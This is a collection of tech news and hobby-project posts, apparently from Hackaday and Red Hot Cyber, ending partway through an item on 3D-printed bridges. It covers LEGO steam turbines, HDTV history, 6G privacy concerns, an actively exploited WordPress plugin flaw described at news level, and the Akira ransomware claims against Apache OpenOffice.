
Making Steam-Powered LEGO Machines


Over the decades we have seen a lot of methods for powering LEGO-based contraptions, ranging from LEGO Technic pneumatics to electric motors, but what about steam power? We have all seen those cute little model steam engines that can definitely put out some power. Sure, you can just drop one in like a kind of confused internal combustion engine, or you can make a steam engine that's actually designed to be directly compatible with LEGO.

While exploring this topic, [Jamie’s Brick Jams] on YouTube found that the primary concern here is simply the very hot steam produced by the boiler. While not a surprise to anyone who has ever run a model steam engine, this poses a major challenge to the thermoplastics used by LEGO.

Obviously a boiler cannot be made out of plastic, but the steam turbine can. That said, material selection here is key, as the hot, wet steam produced by the boiler demolished PLA parts, and ruined the original (and very unsafe) copper boiler in the process. Ultimately a LEGO-Technic-compatible steam turbine was printed in high-temperature-resistant PAHT-CF and PC filament, which enabled a steam-powered LEGO walker to come to life, albeit with a distinct lack of power.

Model steam engine enthusiasts are of course quick to point out that you should try to create dry steam through superheating, definitely add a safety valve and so on, all of which should make for an even more powerful and safe LEGO steam engine. For a rundown of how steam engines work, [Lawrie] did an excellent video on the basics a while back, as well as a video playlist full of demonstrations of both classical Mamod model engines and questionable modern takes.

Suffice it to say that although model steam engines look like toys, they involve fire, hot steam and other fascinating ways to melt things, light them on fire and cause painful injuries, so definitely follow a safety briefing before attempting any of it at home.

youtube.com/embed/g07xCV3uOJw?…


hackaday.com/2025/11/06/making…


2025 Component Abuse Challenge: Overdriven LEDs Outshine the Sun


A drone is shown hovering in the sky, with two bright lights shining from its underside.

Tagging wildlife is never straightforward at the best of times, but it becomes a great deal more complicated when you're trying to track flying insects. Instead of trying to use a sensor package, [DeepSOIC] attached tiny, light retroreflectors to bees and hornets, then used a pulsed infrared light mounted on a drone to illuminate them. Two infrared cameras on the drone track the bright dot that indicates the insect, letting the drone follow it. To get a spot bright enough to track in full sunlight, though, [DeepSOIC] had to drive some infrared LEDs well above their rated tolerances.

The LEDs manage to survive because they only fire in 15-µs pulses at 100 Hz, in synchrony with the frame rate of the cameras, rather like some welding cameras. The driver circuit is very simple, just a MOSFET switch driven by an external pulse source, a capacitor to steady the supply voltage, and a current-limiting resistor doing so little limiting that it could probably be removed. LEDs can indeed survive high-current pulses, so this might not really seem like component abuse, but the 5-6 amps used here are well beyond the rated pulse current of 3 amps for the original SFH4715AS LEDs. After proving the concept, [DeepSOIC] switched to 940 nm LEDs, which provide more contrast because the atmosphere absorbs more sunlight around this wavelength. These new LEDs were rated for 5A, so they weren’t being driven so far out of spec, but in tests they did survive current up to 10A.
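To get a feel for why such brutal overdriving can be survivable, here's a quick back-of-the-envelope sketch (in Python, using only the figures quoted above): the duty cycle is so small that the time-averaged current, and therefore the average heating, stays tiny.

# Back-of-the-envelope check using the figures from the article.
pulse_width = 15e-6   # 15 us pulse
frame_rate = 100      # 100 Hz, synced to the camera frame rate
peak_current = 6.0    # amps, upper end of the 5-6 A drive

duty_cycle = pulse_width * frame_rate    # fraction of the time the LED is on
avg_current = peak_current * duty_cycle  # time-averaged current

print(f"duty cycle: {duty_cycle:.4%}")                  # -> 0.1500%
print(f"average current: {avg_current * 1000:.1f} mA")  # -> 9.0 mA

Averaged out, the LED sees single-digit milliamps; what ultimately limits such tricks is peak junction heating within each 15 µs burst, which is exactly the spec [DeepSOIC] was gambling with.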

We’ve seen a similar principle used to drive laser diodes in very high-power pulses a few times before. For an opposite approach to putting every last bit of current through an LED, check out this low-power safety light.

youtube.com/embed/cRh2XufYJws?…

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/11/06/2025-c…


Share Your Projects: Imperfectionism


Everyone has a standard for publishing projects, and they can get pretty controversial. We see a lot of people complain about hacks embedded in YouTube videos, social media threads, Discord servers, Facebook posts, IRC channels, different degrees of open-sourcing, licenses, searchability, and monetization. I personally have my own share of frustrations with a number of these factors.

It's common to believe that hacking as a culture doesn't thrive until a certain set of conditions is met, and everyone has their own set of conditions in mind. My own sticking point, as you might've seen, is the open-sourcing of code and hardware alike – I think its absence is a sufficiently large barrier to hacking being repeatable, and repeatability is a big part of how hacking culture spreads.

This kind of belief is often self-limiting. Many people believe that their code or PCB source file is not a good contribution to hacking culture unless it meets a certain cleanliness or completeness standard. This is understandable, and I do that, too.

Today, I'd like to argue against my own view, and show how imperfect publishing helps build hacking culture despite its imperfections. Let's talk about open-source in the context of 3D printing.

The Snazzy Ugly Duckling


One little-spoken aspect of 3D printing is how few models are open-source. Printable models published exclusively as STLs are commonplace, STEPs are much less popular, and in my experience, it's soul-crushingly rare to see a source file attached to a model on Printables. I struggle to call that a good thing, and quite obviously, it negatively impacts 3D printing culture – getting into 3D modeling is that much harder if you can't reference the sources for 95% of the models you might get inspired by.

Of course, part of that is that 3D CAD packages are overwhelmingly closed-source paid software, and there are something like five different ones with roughly equal shares of usage. It's hard to meaningfully share sources from within a paywalled, siloed market. Also, unlike software source code, STLs are very much cross-platform. Electronics has a better analogy for STLs: they're just like Gerbers – easy to export, and to inexperienced people, they'll feel like all that anyone would ever need.

For a quick example – out of these eight Printables models taken at random, only the “drawers mini-cabinet” has a source file attached.

Then there's self-consciousness and perfectionism. While rare, I've seen "I will clean this up and publish later" happen in 3D printing spaces too – it's a thoroughly non-viable promise there as well, but I get why people say it; I've personally made and failed on such promises a good few times myself. I'm glad that this isn't a popular excuse so far, but as more people adopt OpenSCAD, Blender, and FreeCAD, with their universally accessible files, maybe we'll see it resurface.

Asking for 3D model sources should probably become part of hacker culture, just like it helped with software. I don’t think it’s great that 3D printing so often implies closed-source 3D models, and undoubtedly that has limited the growth of 3D modeling as a hobby. I strongly wish I could git clone the 3D model projects I find online, and there’s a whole lot of models that are useless to me because I can’t git clone and modify them.

At the same time? 3D printing carries the hacker flag quite strongly, despite the imperfections, and you can notice it by just how often 3D printing appears on our pages. We can and should point at aspects of hacker culture that 3D printing doesn’t yet represent, and while at it, we benefit from the technology, as much as its imperfections hurt us.

Where Is Hackerdom Found?


Would I argue the same about Discord servers? Mastodon-hosted threads? YouTube videos? GitHub repos with barely-documented code? For sure. There’s no shortage of criticism about those, mostly about accessibility issues. Servers and videos are often not externally discoverable, which is surprisingly painful for hacker culture’s ability to thrive and grow. At the very least, we are badly missing out – for instance, I’d say Discord servers and YouTube videos alike are in dire need of external log/transcript hosting capabilities, and tech-oriented Discord servers specifically could benefit from public logs in the same way that modern Discourse forums have them from the get-go.

That's for the disadvantages. As for upsides, YouTube videos make hardware hacking into entertainment for potential hackers not enthralled by scrolling through a blog interspersed with pictures, and they position hacking culture in front of people who'd otherwise miss out on it. Let's take [DIY Perks], a hugely popular YouTube channel. Would that dual-screen laptop build we covered have worked out great as a blog post, or maybe as a paired post and video, as some hackers do? For sure. At the same time, it gets hacking in front of people's faces.

Discord blows as a platform, and I've written a fair bit about just how much it blows. One such snippet is in the article I wrote about the Beepy project, where the Discord server was crucial to growing Beepy as a community-contributed project. Would people benefit from the Beepy project having publicly available logs? Most certainly, and I'd argue the lack of them has hurt the Beepy project's external discoverability. Is that all?

Discord has been an unprecedented communications platform for the Beepy project, and we'd outright lose out if there weren't hardware hacking communities thriving on Discord, as the Hackaday Discord does. I think we should remedy these kinds of problems by building helper tools and arguing for better cultural norms, just like we did with software licenses, because giving up on platforms like Discord currently has a significantly subpar cost-benefit tradeoff.

What about imperfect code? Sometimes, a hacker figures out a small part of a sensor's protocol or a basic feature, and as much as the code might be insufficient or hastily written, they publish it. Have you ever stumbled upon such a repository? I have; sometimes I was happy, and sometimes I was disappointed, but either way, such code tends to require extra work. In the end, I've noticed that it almost always helped way more than it hurt, which in turn has eventually led to me publishing more and more.

I think we’d benefit from a culture where “publish later after cleanup” is replaced by “here’s the code, and I might push some cleanup commits later”. It’s a better contribution to hacker culture and to people who enjoy your work, and the “might” part makes it more honest. It’ll also get your publishing muscles in better shape so that you’re quick to post about things you really ought to post about. For what it’s worth, I don’t think it hurts if this is assisted by social media likes, too.

Strength Through Presence


Survival of hacker culture has so far relied heavily on its presence across all media, and on an ability to press the "maybe I can hack too" button in other people's brains through that presence. Even so, every non-open 3D model, Discord server with non-public logs, YouTube channel with non-transcribed videos, or completely ephemeral TikTok channel still palpably paves the way for future hackers to join our communities, wherever hackerdom might be within ten years' time.

I think the key to these informational impedance mismatches is making it easier for people to meet the high standards we expect, and helping people meet them where appropriate – in large part, by example. It looks like hacking is strongest when it's present everywhere, even when some seams show, and I hope that this kind of overwhelming presence helps us overcome our era's unique cultural hurdles in a way we couldn't hope for just a decade ago.


hackaday.com/2025/11/06/share-…


DIY Powerwall Blows Clouds, Competition Out of the Water


Economists have this idea that we live in an efficient market, but it's hard to fathom that when disposable vapes are equipped with rechargeable lithium cells. Still, just as market economists point out that if you leave a dollar on the sidewalk someone will pick it up, if you leave dollars' worth of lithium batteries on the sidewalk, [Chris Doel] will pick them up and build a DIY home battery bank that we really hope won't burn down his shop.
Testing salvaged batteries.
The Powerwall-like arrangement uses 500 batteries salvaged from disposable vapes. His personal quality control measure while pulling the cells from the vapes was to skip any that had been discharged past 3 V. On the other hand, we’d be conservative too if we had to live with this thing, solid brick construction or not.

That quality control was accomplished by a clever hack in and of itself: he built a device to blow through the found vapes and see if they lit up. (That starts at 3:20 in the vid.) No light? Not enough voltage. Easy. Even if you're not building a home powerbank, you might take note of that hack if you're interested in harvesting other people's deathsticks for lithium cells. The secret ingredient was the pump from a CPAP machine. Actually, it was the only ingredient.

In another nod to safety, he fuses every battery and the links between the 3D-printed, OSHA-unapproved packs. The juxtaposition between the janky build and the careful design nods makes this hack delightful, and we really hope [Chris] doesn't burn down his shed, because we like the cut of his jib and hope to see more hacks from this lad. They likely won't involve nicotine-soaked lithium, however, as the UK is finally banning disposable vapes.

In some ways, that’s a pity, since they’re apparently good for more than just batteries — you can host a website on some of these things. How’s that for market efficiency?

youtube.com/embed/dy-wFixuRVU?…


hackaday.com/2025/11/06/diy-po…


12.5 Million HD Movies per Second! Amazon's Submarine Cable That Will Connect the US to Ireland


In a few years, Ireland and the United States will be linked by a submarine communications cable designed to help Amazon improve its AWS services.

Submarine cables are a vital part of the infrastructure that connects continents. According to media reports, some 570 cables are currently laid across oceans and seas, with another 81 planned. Among them is Amazon's new Fastnet cable, intended to connect the United States and Ireland within a few years and to strengthen the AWS network.

As Amazon announced in a press release, the submarine cable will be laid between Maryland, in the United States, and County Cork, in Ireland. While Amazon has not specified the exact length of the AWS cable, the distance between the two points is around 5,300 kilometers (3,000 miles) as the crow flies. Amazon expects to complete the project by 2028.

According to Amazon, the Maryland-Cork link matters for two reasons. First, Fastnet is designed to act as a backup communications link should other submarine cables fail; because repairing submarine cables is complex, restoring service after damage can take a long time. Fastnet is also designed to meet the growing demand for cloud computing and artificial intelligence via AWS services.

The submarine cable, 37 millimeters thick at its widest point, will carry data between the two endpoints over optical fiber. According to Amazon, this will allow data transfer rates of up to 320 terabits per second, comparable to streaming 12.5 million HD movies simultaneously.
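Amazon's two figures are consistent with each other if you assume a typical bitrate for an HD stream; a quick sketch:

# Sanity-check of Amazon's comparison (a rough sketch; assumes each
# "HD movie" is a single continuous stream).
total_bps = 320e12  # 320 Tb/s claimed cable capacity
streams = 12.5e6    # 12.5 million simultaneous HD streams

per_stream = total_bps / streams
print(f"{per_stream / 1e6:.1f} Mb/s per stream")  # -> 25.6 Mb/s

Roughly 25 Mb/s per viewer is indeed a typical rate for high-quality HD video, so the comparison holds up.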

The high transmission capacity will make it easier for Amazon's automated AWS monitoring systems to manage and reroute heavy loads. The cable also gives Amazon an extra layer of redundancy, mitigating the impact of failures on other cables.

To prevent failures, the submarine cable will be better protected against external influences in coastal zones. In addition to the thin steel strands that protect the optical fiber inside the cable, an extra layer is used in the shallower sections: thicker steel wires wrap around the entire cable and are in turn sheathed in nylon. According to Amazon, this construction is designed to better protect the cable from "natural and man-made factors".

The article "12,5 milioni di film HD al secondo! Il cavo sottomarino di Amazon che collegherà gli USA all'Irlanda" was originally published on Red Hot Cyber.


Japan’s Forgotten Analog HDTV Standard Was Well Ahead Of Its Time


When we talk about HDTV, we're typically talking about any one of a number of standards from when television made the paradigm switch from analog to digital transmission. At the dawn of the new millennium, high-definition TV was a step-change for the medium, perhaps the biggest leap forward since color transmissions began in the middle of the 20th century.

However, a higher-resolution television format did indeed exist well before the TV world went digital. Over in Japan, television engineers had developed an analog HD format that promised quality far beyond regular old NTSC and PAL transmissions. All this, decades before flat screens and digital TV were ever seen in consumer households!

Resolution


Japan’s efforts to develop a better standard of analog television were pursued by the Science and Technical Research Laboratories of NHK, the national public broadcaster. Starting in the 1970s, research and development focused on how to deliver a higher-quality television signal, as well as how to best capture, store, and display it.
The higher resolution of Hi-Vision was seen to make viewing a larger, closer television more desirable. The figures chosen were based on an intended viewing distance of three times the height of the screen. Credit: NHK Handbook
This work led to the development of a standard known as Hi-Vision, which aimed to greatly improve the resolution and quality of broadcast television. At 1125 lines, it offered over double the vertical resolution of the prevailing 60 Hz NTSC standard in Japan. The precise number was chosen to meet minimum image-quality requirements for a viewer with good vision, while sitting in a convenient integer ratio to both NTSC's 525 lines (15:7) and PAL's 625 lines (9:5). Hi-Vision also introduced a shift to the 16:9 aspect ratio from the more traditional 4:3 used in conventional analog television. The new standard also brought with it improved audio, with four independent channels—left, center, right, and rear—in what was termed "3-1 mode." This was not unlike the layout used by Dolby Surround systems of the mid-1980s, though the NHK spec suggests using multiple speakers behind the viewers to deliver the single rear sound channel.
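The quoted line-count ratios are easy to verify:

from fractions import Fraction

# Verify the integer ratios quoted above for Hi-Vision's 1125 lines.
print(Fraction(1125, 525))  # -> 15/7, the ratio to NTSC's 525 lines
print(Fraction(1125, 625))  # -> 9/5, the ratio to PAL's 625 lines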
Hi-Vision offered improved sound, encoded with PCM. Credit: NHK handbook
Hi-Vision referred most specifically to the video standard itself; the broadcast standard was called MUSE—standing for Multiple sub-Nyquist Sampling Encoding. This was a method for dealing with the high bandwidth requirements of higher-quality television. Where an NTSC TV broadcast might only need 4.2 MHz of bandwidth, the Hi-Vision standard needed 20-25 MHz of bandwidth. That wasn’t practical to fit in alongside terrestrial broadcasts of the time, and even for satellite delivery, it was considered too great. Thus, MUSE offered a way to compress the high-resolution signal down into a more manageable 8.1 MHz, with a combination of dot interlacing and advanced multiplexing techniques. The method used meant that ultimately four frames were needed to make up a full image. Special motion-sensitive encoding techniques were also used to limit the blurring impact of camera pans due to the use of the dot interlaced method. Meanwhile, the four-channel digital audio stream was squeezed into the vertical blanking period.

MUSE broadcasts began on an experimental basis in 1989. NHK would eventually begin using the standard regularly on its BShi satellite service, with a handful of other Japanese broadcasters eventually following suit. Broadcasts ran until 2007, when NHK finally shut down the service with digital TV by then well established.

youtube.com/embed/8uKv4PLzrV0?…

An NHK station sign-on animation used from 1991 to 1994.
A station ident from NHK’s Hi-Vision broadcasts from 1995 to 1997. Note the 16:9 aspect ratio—then very unusual for TV. Credit: NHK
The technology wasn't just limited to higher-quality broadcasts, either. Recorded media capable of delivering higher-resolution content also permeated the Japanese market. W-VHS (Wide-VHS) hit the market in 1993 as a video cassette standard capable of recording Hi-Vision/MUSE broadcast material. The W moniker was initially chosen for its shorthand meaning in Japanese of "double", since Hi-Vision used 1125 lines, just over double the 525 lines of an NTSC broadcast.

Later, in 1994, Panasonic released its Hi-Vision LaserDisc player, with Pioneer and Sony eventually offering similar products. They similarly offered 1,125 lines (1,035 visible) of resolution in a native 16:9 aspect ratio. The discs were read using a narrower-wavelength laser than standard laser discs, which also offered improved read performance and reliability.

youtube.com/embed/PA2fF9-7tWo?…

Sample video from a MUSE Hi-Vision Laserdisc. Note the extreme level of detail visible in the makeup palettes and skin, and the motion trails in some of the lens flares.

The hope was that Hi-Vision would become an international standard for HDTV, supplanting the ugly mix of NTSC, PAL, and SECAM formats around the world. Unfortunately, that never came to pass. While Hi-Vision and MUSE did offer a better quality image, there simply wasn't much content actually broadcast in the standard. Only a few channels in Japan were available, creating limited incentive for households to upgrade their existing sets. Similarly, the amount of recorded media available was also limited. The bandwidth requirements were also too great; even with MUSE squishing the signals down, the 8.1 MHz required was still considered too much for practical use in the US market. Meanwhile, being based on a 60 Hz standard meant the European industry was not interested.

Further worsening the situation was that by 1996, DVD technology had been released, offering better quality and all the associated benefits of a digital medium. Digital television technology was not far behind, and buildouts began in countries around the world by the late 1990s. These transmissions offered higher quality and the ability to deliver more channels with the same bandwidth, and would ultimately take over.

youtube.com/embed/pJupQw1FtW8?…

Only a handful of Hi-Vision displays still exist in the world.

Hi-Vision and MUSE offered a huge step up in image quality, but their technical limitations and broadcast difficulties meant that they would never compete with the new digital technologies that were coming down the line. There was simply not enough time for the technology to find a foothold in the market before something better came along. Still, it’s quite something to look back on the content and hardware from the late 1980s and early 1990s that was able, in many ways, to measure up in quality to the digital flat screen TVs that wouldn’t arrive for another 15 years or so. Quite a technical feat indeed, even if it didn’t win the day!


hackaday.com/2025/11/06/japans…


Post SMTP Under Active Exploitation: 400,000 WordPress Sites at Risk


Attackers are going after WordPress websites by exploiting a critical vulnerability in the Post SMTP plugin, which has over 400,000 installations. The hackers are hijacking administrator accounts and gaining complete control over vulnerable sites.

Post SMTP is one of the most popular plugins for sending email from WordPress sites. Its developers pitch it as an advanced alternative to the standard wp_mail() function, offering extended functionality and greater reliability.

The vulnerability was discovered by a security researcher going by netranger, who reported it to Wordfence on October 11. It was assigned the identifier CVE-2025-11833 (CVSS score 9.8). The bug affects all versions of Post SMTP up to and including 3.6.0.

The root of the problem is a missing access-rights check in the __construct function of PostmanEmailLogs.

The component responsible for logging sent emails returns log contents directly on request, without checking who is asking. As a result, anyone can read the emails stored in the logs, including password-reset messages with links for changing administrator credentials. By intercepting such an email, a criminal can change the administrator's password and take full control of the site.

Wordfence notified the plugin's developer of the critical vulnerability on October 15, but the patch was only released on October 29: version 3.6.1 fixes the bug. However, according to WordPress.org statistics, only about half of the plugin's users have installed the update, which means roughly 200,000 websites remain vulnerable.

Worse still, hackers are already exploiting the vulnerability. According to the experts, exploitation attempts against CVE-2025-11833 have been recorded since November 1, and in recent days the company has blocked more than 4,500 such attacks against its customers' websites. Considering that Wordfence protects only part of the WordPress ecosystem, the true number of intrusion attempts could be in the tens of thousands.

It's worth noting that this is the second serious vulnerability found in Post SMTP in recent months. In July 2025, the security firm PatchStack discovered a similar flaw, CVE-2025-24000. That bug likewise allowed the logs to be read and password-reset emails to be intercepted, even by users with minimal privileges.

The article "Post SMTP sotto sfruttamento attivo: 400.000 siti WordPress sono a rischio" was originally published on Red Hot Cyber.


Inside the Mind of the Hacker


Amateurs hack computers, professionals hack people. Bruce Schneier backs this famous, punchy summary of what hacking means with a refined argument in his latest book, La mente dell'hacker. Trovare la falla per migliorare il sistema, published in Italian in 2024 by Luiss University Press.

The title already says a lot. For a start, the hacker is no longer the monster of the worst reporting of recent years, but a figure to be read in chiaroscuro against the evolution of human systems.

Moreover, hacking, understood as the exploration of the possibilities within a given system (a term originally tied to the world of computing), has according to Schneier become an ever-present practice in economic, financial, and social systems. A methodical approach to finding the structural vulnerabilities that define our world, hacking shows how any system, from tax law to artificial intelligence, can be manipulated and exploited: from hacking the tax system to pay less tax (see Google & Co.), to jackpotting, ransomware, and cyberattacks between states. For the author, every hack can be read as a key instrument in the management of power and money in their many facets.

A hack is, after all, "an activity allowed by a system that subverts the goals or intent of that system." And what else is a system but "a complex process, governed by a set of rules or norms, designed to produce one or more desired outcomes"? So hacking is exactly this: finding a system's vulnerability and the exploit to take advantage of it. Ultimately it holds for every system: computing, sociotechnical, cognitive. The goal of hacking is to gain an advantage. But countermeasures are always possible. That goes for democracy, which can defend itself against unforeseen uses of the freedoms it grants, and it goes for Artificial Intelligence too: by hacking it, we better understand how it can be put at the service of people rather than of war and profit. Since freedom and democracy now rest on computing systems, hackers can still claim the title of "heroes of the computer revolution," as Steven Levy called them back in 1996.


dicorinto.it/articoli/recensio…


Countdown To Pi 1 Loss Of Support, Activated


The older Raspberry Pi boards have had a long life, serving faithfully since 2012. Frankly, their continued support is a rarity these days — it's truly incredible that an up-to-date OS image can still be downloaded for them in 2025. All good things must eventually come to an end though, and perhaps one of the first signs of that moment for the BCM2835 could be seen in Phoronix's report on Debian dropping support for the MIPS64EL and ARMEL architectures. Both are long in the tooth and, other than ARMEL in the Pi, rarely encountered now, so were it not for the little board from Cambridge this might hardly be news. But what does it mean for the older Pi?

It's first important to remind readers that there's no need to panic just yet, as the support is going not for the mainstream Debian releases, but the unstable and experimental ones. The mainstream Debian support period for the current releases, presumably including the Debian-based Raspberry Pi OS, extends until 2030, which tallies well with Raspberry Pi's own end-of-life date for their earlier boards. But it's a salutary reminder that the clock's ticking, should you (like some of us) be running an older Pi. You've got about five years.


hackaday.com/2025/11/06/countd…


They Told You 6G Will Be Fast, Right? But They Didn't Tell You the Whole Truth


It isn't "just faster": 6G changes the very nature of the network!

When we talk about 6G we risk reducing everything to a speed upgrade, as if the network of the future were just 5G with more horsepower. In reality the leap isn't about bandwidth, but about how the network will perceive the world. For the first time, a mobile network won't merely transmit and receive signals: it will observe its surroundings in order to operate correctly.

MSCP: the fusion of visual and radio sensing that changes the paradigm


The IEEE study introduces the MSCP technique, a hybrid approach that fuses RF information with images of the environment. Cameras analyze the surroundings, AI models predict the behavior of the radio channel, and the system corrects the transmission before the blockage occurs.

The gain, scientifically speaking, is enormous: over 77% better predictive accuracy than techniques based on the radio signal alone. But to achieve that precision, the network has to know who is moving, where they are moving, and how.

Technical details and full results are described in the IEEE paper on MSCP and in the work on the DeepSense 6G dataset, which enables multimodal channel prediction.

The hidden price: the network doesn't "see data", it sees bodies


We're not talking about traffic analysis or technical telemetry here. We're talking about a network that, in order to function, must build a spatio-temporal model of human movement. It doesn't matter that it recognizes no faces: a trajectory is already a behavioral identifier.

The GDPR says as much, the AEPD confirms it, and years of studies on fingerprinting and re-identification via metadata prove it. If Wi-Fi tracking already counts as processing of personal data, imagine a system that combines radio, video, and machine learning in real time.

Surveillance without declared cameras: the perfect trick


A conventional camera requires signage, privacy notices, usage limits, a legal basis. A 6G network with integrated sensing does not: it's "part of the technical infrastructure". It doesn't record video; it generates metadata. It doesn't look like surveillance, but it is. And it will be more pervasive, invisible, and harder to contest than any CCTV system. There's no longer any need to mount an electronic eye on a pole: an antenna on a roof is enough. The "sensing + AI" direction isn't a one-off, either: projects like DeepSense 6G collect real multi-modal data (mmWave, camera, GPS, LiDAR, radar) precisely to enable these channel-prediction and localization functions.

A privacy violation? No, a violation of the body's sovereignty in space


The real risk isn't the gaze on a single individual, but the loss of the collective right to physical invisibility. A network that continuously maps people's movements enables, by definition, scenarios of social monitoring: protest flows, behavioral geofencing, predictive analysis of groups, crowd control, environmental profiling. All without ever invoking facial recognition or classical biometrics.

Today's European legal framework would already be incompatible, if anyone actually enforced it


The GDPR's data-minimization principle would make it hard to defend using computer vision to solve a telecommunications problem when less invasive alternatives exist. ePrivacy bans covert analysis of terminals. The AI Act will classify environmental surveillance systems as high-risk. But the real knot lies elsewhere: as long as the technology stays in papers, the law doesn't react. By the time it reaches products, it will already be too late.

The final question isn't technical: it's political

  • Is it lawful to use computer vision to improve a radio channel?
  • Is it proportionate?
  • Is it necessary?

Who decides when the network observes, what it observes, for how long, and within what limits?
And above all: who guarantees that it will do so only to "optimize quality of service"?

Conclusions


If we accept without pushback the idea that "the network has to see us in order to work", then we will no longer need a privacy regulator. We will need a regulator for unmonitored human movement.

6G will be a technological marvel.
But let's remember one simple rule:
when a technology offers you extraordinary performance in exchange for a new level of tracking, it isn't innovating.
It's negotiating away your freedom.

And as always, the weak party to the contract… is you.

The difference between infrastructure and surveillance comes down to one thing:
the limit you decide to impose on it before it becomes inevitable.

The article "Ti hanno detto che il 6G sarà veloce vero? Ma non ti hanno detto tutta la verità" was originally published on Red Hot Cyber.


Make Metal Rain with Thermal Spraying


Alec using the arc spraying device

Those of us hackers who have gone down a machining rabbit hole know how annoying it can be to over-machine a part. Thermal spraying, while sounding sci-fi, is a method where you can just spray that metal back onto your workpiece. If you don't care about machining, how about a gun that shoots a shower of sparks just to coat your enemies in a layer of metal? Welcome to the world of thermal spraying, led by the one and only [Alec Steele].

Three main techniques are shown for laying down metal coatings. The first, termed flame spraying, uses a propane flame and compressed air to blast fine droplets of molten metal onto your surface. A fuel-rich mixture keeps the metal unoxidized and protects the surface beneath. Perhaps the most fun to use is the arc method of thermal spraying: two wires feed together to short a high-current circuit, and all it takes from there is a little pressurized air to create a shower of molten metal. The last method is similar to the first, but uses a powdered feedstock rather than the wire used in flame spraying.

As with much crazy tech, the main uses of thermal spraying are somewhat mundane. Coatings are applied to prevent oxidation, to add material for re-machining, or to improve the mechanical resistance of a part. As expensive as this tech is, we would love to see someone attempt an open-source version for all of us at Hackaday to play with. You can't call it too crazy when we have people making their own X-ray machines.

youtube.com/embed/e-QcseGvU5o?…


hackaday.com/2025/11/06/make-m…


Apache OpenOffice Hit by Ransomware Claims, but the Foundation Pushes Back


The Apache OpenOffice project has come under the spotlight after the Akira ransomware group claimed to have carried out a cyberattack and stolen 23 gigabytes of internal data.

However, the organization that oversees the office suite's development disputes those claims, citing the absence of any evidence of a leak and inconsistencies with how the project is actually structured.

Information about the alleged attack appeared on Akira's leak site on October 30. The attackers claimed to have gained access to internal reports, financial documents, and personal data, including addresses, phone numbers, driver's licenses, social security numbers, and even banking details.

They asserted that the leak involved not just corporate material but also details about problems with the software itself.

Representatives of the Apache Software Foundation have expressed doubts about those claims. The foundation holds no information of the sort that could have been stolen, since the OpenOffice project is built and maintained entirely by volunteers who are not employees of the foundation.

The project's structure includes no paid positions, which means no personnel or payroll data is collected. Development happens in public via open mailing lists, and all requests and discussions are freely accessible.

It was also stressed that no ransom demand has been made to the foundation, and that no signs of compromise of the project's infrastructure have been found. The organization's representatives clarified that, as of the investigation, no contact had been made with law enforcement or third-party security specialists, as there were no grounds to do so.

Despite the hackers' assertions, the Akira group has yet to publish any evidence backing its claims. As of early November, none of the material allegedly obtained in the attack had been made public.

The article "Apache OpenOffice sotto attacco ransomware, ma la fondazione contesta" was originally published on Red Hot Cyber.


Spectravideo Computers Get A Big Upgrade


Spectravideo is not exactly the most well-known microcomputer company, but they were nevertheless somewhat active in the US market from 1981 to 1988. Their computers still have a fanbase of users and modders. Now, as demonstrated by [electricadventures], you can actually upgrade your ancient Spectravideo machine with some modern hardware.

The upgrade in question is the SVI-3×8 PicoExpander from [fitch]. It's based on a Raspberry Pi Pico 2W, and is built to work with the Spectravideo 318 and 328 machines. If you're running a 328, it will offer a full 96 kB of additional RAM, while if you're running a 318, it will add 144 kB more RAM and effectively push the device up to 328 spec. It's also capable of emulating a pair of disk drives or a cassette drive, with saving and loading images possible over Wi-Fi.

It’s worth noting, though, that the PicoExpander pushes the Pico 2W well beyond design limits, overclocking it to 300 MHz (versus the original 150 MHz clock speed). The makers note it is “bleeding edge” hardware and that it may not last as long as the Spectravideo machines themselves.

Design files are available on Github if you want to spin up your own PicoExpander, or you can just order an assembled version. We’ve seen a lot of other neat retrocomputer upgrades built around modern hardware, too. Video after the break.

youtube.com/embed/ACU958Gl7Ac?…

[Thanks to Stephen Walters for the tip!]


hackaday.com/2025/11/05/spectr…


A Pentium In Your Hand


Handheld computers have become very much part of the hardware hacker scene, as the advent of single board computers long on processor power but short on power consumption has given us the tools we need to build them ourselves. Handheld retrocomputers face something of an uphill struggle though, as many of the components are over-sized, and use a lot of power. [Changliang Li] has taken on the task though, putting an industrial Pentium PC in a rather well-designed SLA printed case.

Aside from the motherboard there’s a VGA screen, a CompactFlash card attached to the IDE interface, and a Logitech trackball. As far as we can see the power comes from a USB-C PD board, and there’s a split mechanical keyboard on the top side. It runs Windows 98, and a selection of peak ’90s games are brought out to demonstrate.

We like this project for its beautiful case and effective use of parts, but we're curious whether, instead of the Pentium board, it might have been worth finding a later industrial PC to give it a greater breadth of possibilities, there being few x86 SBCs. Either way it would have blown our minds back in '98, and we can see it's a ton of fun today. Take a look at the machine in the video below the break.

youtube.com/embed/G7RhMOKQaTs?…

Thanks [Stephen Walters] for the tip.


hackaday.com/2025/11/05/a-pent…


Better 3D-Printed Bridges Are Possible, With the Right Settings


The header image above shows a completely unsupported 3D-printed bridge, believe it or not. You’re looking at the bottom of the print. [Make Wonderful Things] wondered whether unsightly unsupported bridges could be improved, and has been busy nailing down remarkably high-quality results by exhaustive testing of different settings.

It all started when they thought that unsupported bridges looked a lot as though they were made from ropes stretched between two points. Unlike normal layers, these stretched extrusions didn’t adhere to their neighbors. They are too far apart from one another, and there’s no “squish” to them. But could this be overcome?

His experiments centered mainly around bridge printing speed, temperature, and bridge flow. That last setting affects how much the extrusion from the hot end is adjusted when printing a bridge. He accidentally increased it past 1.0 and thought the results were interesting enough to follow up on; it seemed that a higher flow rate when printing a bridge gave the nudge that was needed to get better inter-line adhesion. What followed was a lot of testing, finally settling on something that provided markedly better results than the stock slicer settings. Markedly better on his test pieces, anyway.
BF = Bridge flow, BS = Bridge printing speed (in mm/sec)
The best results seem to come from tweaking the Bridge Flow rate high enough that extrusions attach to their neighbors, printing slowly (he used 10 mm/sec), and ensuring the bridged area is as consistent as possible. There are still open questions, like some residual sagging at corners he hasn’t been able to eliminate, but the results otherwise look great. And it doesn’t even require laying one’s printer on its side!
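The "ropes" observation above also suggests a toy model of why the flow rate has to go well past 1.0 before bridge lines fuse. The sketch below uses assumed nominal dimensions (0.4 mm line width and spacing, 0.2 mm layer height; none of these come from the video): with nothing underneath to squish against, treat each unsupported extrusion as relaxing into a round rope of the same volume.

import math

# Toy model: an unsupported bridge line relaxes into a round "rope"
# carrying the same volume of plastic per millimetre travelled.
line_width, layer_height, line_spacing = 0.4, 0.2, 0.4  # mm, assumed nominal

for bridge_flow in (1.0, 1.25, 1.6):
    area = bridge_flow * line_width * layer_height  # mm^2 of plastic per mm
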